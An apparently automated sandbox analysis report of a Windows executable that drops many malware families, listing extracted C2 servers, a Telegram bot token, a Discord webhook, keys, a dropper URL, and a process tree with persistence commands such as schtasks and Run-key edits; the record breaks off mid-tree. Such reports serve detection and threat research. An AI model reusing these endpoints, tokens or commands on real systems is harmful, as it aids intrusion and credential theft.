Analysis

  • max time kernel
    27s
  • max time network
    63s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    25/03/2025, 19:33

General

  • Target

    07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe

  • Size

    74.9MB

  • MD5

    c7043b9b65e252b5305634da4f5515f1

  • SHA1

    129a58d2c6c4de7fcead562f9729a28e517fb6d4

  • SHA256

    07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a

  • SHA512

    cdc28eb03dcf533d19e74d7bd86962905486902c5556c448bbf0daa69be705dc1f18c7ea2c41ba8568a1910efb711edaa259a02d35108474e412b8044b719575

  • SSDEEP

    1572864:Z6x3bF0F9U7b7ewHkli+ouzl1IBMrGZHdk/6eSDFb:UBF0Fsb7ewHkliN4km+91xb

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

sharpstealer

C2

https://api.telegram.org/bot7057429288:AAHYl5_27YU1Yjmuj33WKOqLVSgYtq3n-8k/getUpdates

Extracted

Family

lokibot

C2

https://rottot.shop/Devil/PWS/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Extracted

Family

silverrat

Version

1.0.0.0

C2

clear-spice.gl.at.ply.gg:62042

Mutex

SilverMutex_ZtRAjMMKxS

Attributes
  • certificate

    MIIE4DCCAsigAwIBAgIQAKQYOfZd86J2BfNjhG4CWTANBgkqhkiG9w0BAQ0FADARMQ8wDQYDVQQDDAZTaWx2ZXIwIBcNMjIwODI2MTkwMTA4WhgPOTk5OTEyMzEyMzU5NTlaMBExDzANBgNVBAMMBlNpbHZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAPbpOWfhZTuOfEaqqImTTe5dNHAAry7/mf00DCoI4lPZfypsc1tYraxSPFeayGu09a3qdhkWKSVIgwnu2n4GLQNOCY9fh/1oyrX4Iir3BIkYeU7pKTWgjhUlAmFAUAaNr0ca23Ku2kN79jrDzRznOgE2DEW4p7OiM4Mb097ma9lzu7MyssHbY4VCteAhj9HZiplqBxaC1vXDmzxqG+gUZ1aLcyG7ssdkOjtWVBgT3gD/gOl7KchRzCFB1egDC/vD9WZCG35U3Ngi+IkTznoXR1R06cq4v0UnGjE37R2vcB21qb0ZYNiZJXZHv5i9+R7xoPeNoLda5PqnfGGbhPvNEdD56mdcOKlzGIuyemLkUo8texdpiBWKbtc3JZf5VsKxjJtHDK3xW6gDGI+PAirzGkFPmwcf8WgsblvzLg8OZpVxVs8rmKWoi6qIrf4CXnyl73J4lgzW+ir7PjANAQXwLNGdNnvdMeLeo/muGQPdeNpr6OczGGnkWA4qniHeL51/Gx0a8A+jP9zKiyu+qHcsP2IotgWDH/KlzJVr7IAum+DV92uV8poTDcUNcHaKvhHA65KmEtsvLbK6lFZcAMC0eWC0VgpW44T1/16rOaaky5mP6rTMc3nSyOl/lU/XgAgGGQPe22bRLWYzd3WVeEpI1WnHYXS+tL9IOe4kJP+pYsWDAgMBAAGjMjAwMB0GA1UdDgQWBBR32TJj2LeUx9L+RcSOvmFV6VJq6TAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQA+qucSOi7ov7Q1FmAjMf925KuvKuCNwJiu3Sqo3FDGVAD1fAwAi2FdyuXEO2VIUPZCkalFcBna5rqyrc6tcS4T0IL2TsYLrsuGir7PWP7CAcft1urYS1HpNpHxeH/nixwnQaQs/MuRmdm2TeCj6G21P5BTW55U5y9sMPSYwhbD2N7XLgnSQd5Y+80TR7FUiye/k3D37fI9PRhSQGbfYFRQQTmxj84dPTnY5CVgaY9d8fNiFZkyjaZdf+mibK0xQTf+xLVVj+toDNCkc1F462TdmFhCrHd4PoMo0yLDNv4SC6NLRq4haWDRtORw6gd5GYIoCQ3m3oQvNlNxXhhIjsOyxkxOrkCD0c+57PIc7EmKXieJa/XxnkcIVxO8dvTY/vijuz/VaZYl/lPu9ckuqgJ1wRvvsHl70Trv4Mn4X5uCIqRFFlK/mSOZbLIguGkDN3QIZABvej89vlZMhrVfZOG2oawe23FskHjv7thF/WzOXtWw6RUVC1V+hCwbuxFNUjZmmOTUwdXHnus7I2AuiG6Jz1+y9aYiXBcVTdSljxjHRRmiRaAnY94h58vN8NJ4hKL2GVCo6LxkpuplmcntJN0cKraKTPxSXcCRrqWxX9qoIbfvBcUU4vH1jPJCCLNCuDyD3lgQkpPVvq0EMU1a2HFGgMEQMjpYpb38rcadDhT5ag==

  • decrypted_key

    -|S.S.S|-

  • discord

    https://discord.com/api/webhooks/1335733715820609557/QV6ZUiJPFo3MXmoiKBB-WTBlkHeBiFxmRY95RN_M1sHhPMswAoo2T6AL_kHvoSoCRKE0

  • key

    yy6zDjAUmbB09pKvo5Hhug==

  • key_x509

    dFRzdEVvbU9ZVUR2UmVzZFlPR3V3dlRGWURZdk9S

  • payload_url

    https://g.top4top.io/p_2522c7w8u1.png

  • reconnect_delay

    2

  • server_signature

    PtC8aQAwsdmyktc6Q/l3u9a8oFTj+Ey3VIlIKXe9bX2WiEn7hNPQ0tkMLi1qQ4IBmCWOFTRIVHi2GG5zTxUlAwkitK3X3bWdHiwrf6PqZ7NdmPsSKZym4q+nKXH4df40wtjNvJ2x2m8OSi5jsVvT64/UsmRfIZbFTRp63PCTQ6lN+EL6OoW+dMidok+JH6T8pG21/HyoeykN9muipEqdoixkTFitX6aUocvGy6VZCs7eSxoXtzmYQ3tBukBHuIZAivbVLiF2aDkkpSX6763SGMYUbfASkQ/ihv1elb+XOoqprP3V4GqcllwfGzlk+8/rQD8C3cwLiQEtXgKHbyYWrNcSvis5fYgRcEDvlk2ZkbE8VQE6aNc+VN0TZNW3ldvE+h62kKCYoOb7oJDwiw86IudT01xe9YetmDuCvOIBZqGoXj0h68jOIklH4g22Fx8pOaIisv01vdSoawFzoOQNfgfZeRgjvV6QJHQiYuodn+FWlPwYxQ7FzUJy3is8d0VoJr6rG2BeEn99pW/LO+SsCfPIGZvs7oA/oEsn2BBkGVhlko0IZCxd30q3HIEIwdagGJgHVtnC5C2yMsmjV3geQMUCdRsAJEuCEVqAkTr7QQNJoSCok8jOYoOeJxzwbNzAMySliCDNoGYhhU/jnfhJKsqo355RYtvKROehEYZ0Srg=

Extracted

Family

danabot

C2

51.178.195.151

51.222.39.81

149.255.35.125

38.68.50.179

51.77.7.204

rsa_pubkey.plain

Extracted

Family

quasar

Version

1.3.0.0

Botnet

nigga

C2

niggahunter-28633.portmap.io:28633

Mutex

QSR_MUTEX_m0fef2zik6JZzavCsv

Attributes
  • encryption_key

    E3KUWr7JQZqCWN4hstks

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Runtime Broker

  • subdirectory

    SubDir

Extracted

Family

lumma

C2

https://t5impactsupport.world/api

https://nestlecompany.world/api

https://mercharena.biz/api

https://stormlegue.com/api

https://blast-hubs.com/api

https://blastikcn.com/api

https://lestagames.world/api

Extracted

Family

asyncrat

Version

0.5.6B

Botnet

null

C2

rootedkrypto-29674.portmap.host:29674

Mutex

jsmjjhooulqefd

Attributes
  • delay

    5

  • install

    true

  • install_file

    Minecraft.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

dropout-37757.portmap.host:55554

dropout-37757.portmap.host:37757

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

amadey

Version

2.06

Botnet

216cb1

Attributes
  • install_dir

    a5410c88f1

  • install_file

    bween.exe

  • strings_key

    98f994e2e32b679144ff91a0b2c90190

  • url_paths

    /g5vpppHc/index.php

rc4.plain

Extracted

Family

crimsonrat

C2

185.136.161.124

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

xworm

Version

5.0

C2

142.147.96.74:7000

buinhatduy01.ddns.net:7000

buinhatduy.duckdns.org:7000

Mutex

O9hqaPBmS3qVW6ON

Attributes
  • Install_directory

    %AppData%

  • install_file

    AggregatorHost.exe

aes.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • CrimsonRAT main payload 1 IoCs
  • CrimsonRat

    Crimson RAT is a malware linked to a Pakistani-linked threat actor.

  • Crimsonrat family
  • Danabot

    Danabot is a modular banking Trojan that has been linked with other malware.

  • Danabot family
  • Danabot x86 payload 1 IoCs

    Detection of Danabot x86 payload, mapped in memory during the execution of its loader.

  • Detect Xworm Payload 1 IoCs
  • Gh0st RAT payload 1 IoCs
  • Gh0strat

    Gh0st RAT is a remote access tool (RAT) with its source code public and it has been used by multiple Chinese groups.

  • Gh0strat family
  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Lokibot family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies firewall policy service 3 TTPs 3 IoCs
  • Phemedrone

    An information and wallet stealer written in C#.

  • Phemedrone family
  • Quasar RAT 5 IoCs

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 4 IoCs
  • Sality

    Sality is backdoor written in C++, first discovered in 2003.

  • Sality family
  • Sharp Stealer

    Sharp Stealer is an infostealer first observed in 2024, based on Echelon and Umbral stealers.

  • Sharpstealer family
  • SilverRat

    SilverRat is trojan written in C#.

  • Silverrat family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • UAC bypass 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 6 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 2 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 3 IoCs
  • Sets file to hidden 1 TTPs 2 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 64 IoCs
  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Obfuscated with Agile.Net obfuscator 1 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Uses the VBS compiler for execution 1 TTPs
  • VMProtect packed file 2 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Windows security modification 2 TTPs 7 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 12 IoCs
  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Enumerates connected drives 3 TTPs 11 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops autorun.inf file 1 TTPs 18 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Drops file in System32 directory 8 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • UPX packed file 14 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 12 IoCs
  • Drops file in Windows directory 5 IoCs
  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 11 IoCs
  • Modifies registry class 11 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • NTFS ADS 2 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 8 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 22 IoCs
  • Suspicious use of SendNotifyMessage 16 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 3 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:488
      • C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe
        C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe C:\Users\Admin 0
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Drops file in System32 directory
        • Drops file in Windows directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2280
    • C:\Windows\system32\taskhost.exe
      "taskhost.exe"
      1⤵
        PID:1060
      • C:\Windows\system32\Dwm.exe
        "C:\Windows\system32\Dwm.exe"
        1⤵
          PID:1120
        • C:\Windows\Explorer.EXE
          C:\Windows\Explorer.EXE
          1⤵
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:1180
          • C:\Users\Admin\AppData\Local\Temp\07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
            "C:\Users\Admin\AppData\Local\Temp\07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe"
            2⤵
            • Quasar RAT
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2772
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAZgBxACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGIAYgByACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARABpAGQAIAB5AG8AdQAgAGsAbgBvAHcAIAB5AG8AdQAnACcAcgBlACAAZgB1AGMAawBlAGQAIAB3AGkAdABoACAAYQAgAHMAaABpAHQAIAB0AG8AbgAgAG8AZgAgAFIAQQBUACAAZgBhAG0AaQBsAGkAZQBzAD8AIABPAGgAIAB3AGUAbABsACwAIABlAG4AagBvAHkAIAB0AGgAZQAgAG0AYQB5AGgAZQBtACEAJwAsACcAJwAsACcATwBLACcALAAnAEkAbgBmAG8AcgBtAGEAdABpAG8AbgAnACkAPAAjAHUAdQBxACMAPgA="
              3⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2916
            • C:\Users\Admin\AppData\Local\Temp\_[MyFamilyPies]Avi.exe
              "C:\Users\Admin\AppData\Local\Temp\_[MyFamilyPies]Avi.exe"
              3⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious use of AdjustPrivilegeToken
              PID:2192
              • C:\Users\Admin\AppData\Roaming\Installer.exe
                "C:\Users\Admin\AppData\Roaming\Installer.exe"
                4⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:2132
            • C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe
              "C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe"
              3⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:2708
              • C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe
                "C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe"
                4⤵
                • System Location Discovery: System Language Discovery
                PID:4616
                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                  C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
                  5⤵
                    PID:8000
                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                    C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
                    5⤵
                      PID:6736
                • C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe
                  "C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe"
                  3⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Drops autorun.inf file
                  • System Location Discovery: System Language Discovery
                  PID:2692
                • C:\Users\Admin\AppData\Local\Temp\0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe
                  "C:\Users\Admin\AppData\Local\Temp\0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe"
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:2536
                  • C:\Users\Admin\AppData\Local\Temp\svchost.exe
                    "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
                    4⤵
                    • Executes dropped EXE
                    • Adds Run key to start application
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2068
                  • C:\Users\Admin\AppData\Local\Temp\proxyt.exe
                    "C:\Users\Admin\AppData\Local\Temp\proxyt.exe"
                    4⤵
                    • Executes dropped EXE
                    • Drops file in System32 directory
                    PID:2856
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c del C:\Users\Admin\AppData\Local\Temp\proxyt.exe > nul
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:4260
                • C:\Users\Admin\AppData\Local\Temp\1aae7dcfcb679f01938f1bfff990a87ccaaa9b9bed05ff85d64cdc7e925b83ef.exe
                  "C:\Users\Admin\AppData\Local\Temp\1aae7dcfcb679f01938f1bfff990a87ccaaa9b9bed05ff85d64cdc7e925b83ef.exe"
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1928
                • C:\Users\Admin\AppData\Local\Temp\5d2514a19b4099f082c344112df843b0bdf48c861c4dd81992758a8c10d38351.exe
                  "C:\Users\Admin\AppData\Local\Temp\5d2514a19b4099f082c344112df843b0bdf48c861c4dd81992758a8c10d38351.exe"
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:2036
                  • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                    "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                    4⤵
                      PID:4640
                  • C:\Users\Admin\AppData\Local\Temp\783e538320d6a9f69ac93e74a1296403cd8824596c535f8fc563fbbc21bf362d.exe
                    "C:\Users\Admin\AppData\Local\Temp\783e538320d6a9f69ac93e74a1296403cd8824596c535f8fc563fbbc21bf362d.exe"
                    3⤵
                    • Executes dropped EXE
                    • Checks whether UAC is enabled
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1552
                  • C:\Users\Admin\AppData\Local\Temp\DanaBot.exe
                    "C:\Users\Admin\AppData\Local\Temp\DanaBot.exe"
                    3⤵
                    • Executes dropped EXE
                    PID:1680
                    • C:\Windows\SysWOW64\regsvr32.exe
                      C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\AppData\Local\Temp\DanaBot.dll f1 C:\Users\Admin\AppData\Local\Temp\DanaBot.exe@1680
                      4⤵
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      PID:2804
                      • C:\Windows\SysWOW64\rundll32.exe
                        C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\DanaBot.dll,f0
                        5⤵
                        • Blocklisted process makes network request
                        • Loads dropped DLL
                        • System Location Discovery: System Language Discovery
                        PID:2688
                  • C:\Users\Admin\AppData\Local\Temp\Discord Nitro Generator and Checker.exe
                    "C:\Users\Admin\AppData\Local\Temp\Discord Nitro Generator and Checker.exe"
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2920
                    • C:\Windows\system32\WerFault.exe
                      C:\Windows\system32\WerFault.exe -u -p 2920 -s 1060
                      4⤵
                        PID:404
                    • C:\Users\Admin\AppData\Local\Temp\2020.exe
                      "C:\Users\Admin\AppData\Local\Temp\2020.exe"
                      3⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Adds Run key to start application
                      • Suspicious use of SetThreadContext
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2176
                      • C:\Users\Admin\AppData\Local\Temp\2020.exe
                        "C:\Users\Admin\AppData\Local\Temp\2020.exe"
                        4⤵
                        • Executes dropped EXE
                        PID:2420
                      • C:\Users\Admin\AppData\Local\Temp\2020.exe
                        "C:\Users\Admin\AppData\Local\Temp\2020.exe"
                        4⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:1680
                    • C:\Users\Admin\AppData\Local\Temp\0000005d66af8b05750bd3231458a60857425334f7ee2821a627328fb79084d0.exe
                      "C:\Users\Admin\AppData\Local\Temp\0000005d66af8b05750bd3231458a60857425334f7ee2821a627328fb79084d0.exe"
                      3⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of SetWindowsHookEx
                      PID:900
                      • C:\Users\Admin\AppData\Local\Temp\0000005d66af8b05750bd3231458a60857425334f7ee2821a627328fb79084d0.exe
                        "C:\Users\Admin\AppData\Local\Temp\0000005d66af8b05750bd3231458a60857425334f7ee2821a627328fb79084d0.exe"
                        4⤵
                        • Executes dropped EXE
                        • Checks whether UAC is enabled
                        • Drops file in Windows directory
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of SetWindowsHookEx
                        PID:4168
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\APXPC.bat" "
                          5⤵
                            PID:5804
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "skypee" /t REG_SZ /d "C:\Windows\Skypee\skypee.exe" /f
                              6⤵
                              • Adds Run key to start application
                              • System Location Discovery: System Language Discovery
                              PID:4980
                          • C:\Windows\Skypee\skypee.exe
                            "C:\Windows\Skypee\skypee.exe"
                            5⤵
                            • Suspicious use of SetWindowsHookEx
                            PID:5600
                            • C:\Windows\Skypee\skypee.exe
                              "C:\Windows\Skypee\skypee.exe"
                              6⤵
                                PID:7248
                              • C:\Windows\Skypee\skypee.exe
                                "C:\Windows\Skypee\skypee.exe"
                                6⤵
                                  PID:7444
                                  • C:\Windows\syswow64\svchost.exe
                                    C:\Windows\syswow64\svchost.exe
                                    7⤵
                                      PID:200
                            • C:\Users\Admin\AppData\Local\Temp\DevilRAT.exe
                              "C:\Users\Admin\AppData\Local\Temp\DevilRAT.exe"
                              3⤵
                              • Executes dropped EXE
                              • Accesses Microsoft Outlook profiles
                              • outlook_office_path
                              • outlook_win_path
                              PID:444
                            • C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe
                              "C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe"
                              3⤵
                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2424
                            • C:\Users\Admin\AppData\Local\Temp\goofy.exe
                              "C:\Users\Admin\AppData\Local\Temp\goofy.exe"
                              3⤵
                              • Executes dropped EXE
                              PID:1516
                              • C:\Windows\System32\attrib.exe
                                "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\sdsdasd"
                                4⤵
                                • Sets file to hidden
                                • Views/modifies file attributes
                                PID:8076
                              • C:\Windows\System32\attrib.exe
                                "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\sdsdasd\$77bloody_was_here.exe"
                                4⤵
                                • Sets file to hidden
                                • Views/modifies file attributes
                                PID:2788
                              • C:\Windows\system32\cmd.exe
                                cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpD318.tmp.bat""
                                4⤵
                                  PID:8120
                              • C:\Users\Admin\AppData\Local\Temp\FutureClient.exe
                                "C:\Users\Admin\AppData\Local\Temp\FutureClient.exe"
                                3⤵
                                • Executes dropped EXE
                                PID:2640
                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe
                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Suspicious use of SetThreadContext
                                  • System Location Discovery: System Language Discovery
                                  PID:108
                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe
                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe"
                                    5⤵
                                    • Executes dropped EXE
                                    PID:1312
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 108 -s 556
                                    5⤵
                                    • Loads dropped DLL
                                    • Program crash
                                    PID:524
                              • C:\Users\Admin\AppData\Local\Temp\nigga.exe
                                "C:\Users\Admin\AppData\Local\Temp\nigga.exe"
                                3⤵
                                • Executes dropped EXE
                                PID:768
                                • C:\Windows\SysWOW64\schtasks.exe
                                  "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\nigga.exe" /rl HIGHEST /f
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:2296
                                • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
                                  "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
                                  4⤵
                                  • Adds Run key to start application
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of SetWindowsHookEx
                                  PID:2800
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:8028
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c ""C:\Users\Admin\AppData\Local\Temp\icoULUjZPSvv.bat" "
                                    5⤵
                                      PID:6860
                                      • C:\Windows\SysWOW64\chcp.com
                                        chcp 65001
                                        6⤵
                                          PID:5288
                                        • C:\Windows\SysWOW64\PING.EXE
                                          ping -n 10 localhost
                                          6⤵
                                          • System Network Configuration Discovery: Internet Connection Discovery
                                          • Runs ping.exe
                                          PID:6608
                                        • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
                                          "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
                                          6⤵
                                            PID:2656
                                            • C:\Windows\SysWOW64\schtasks.exe
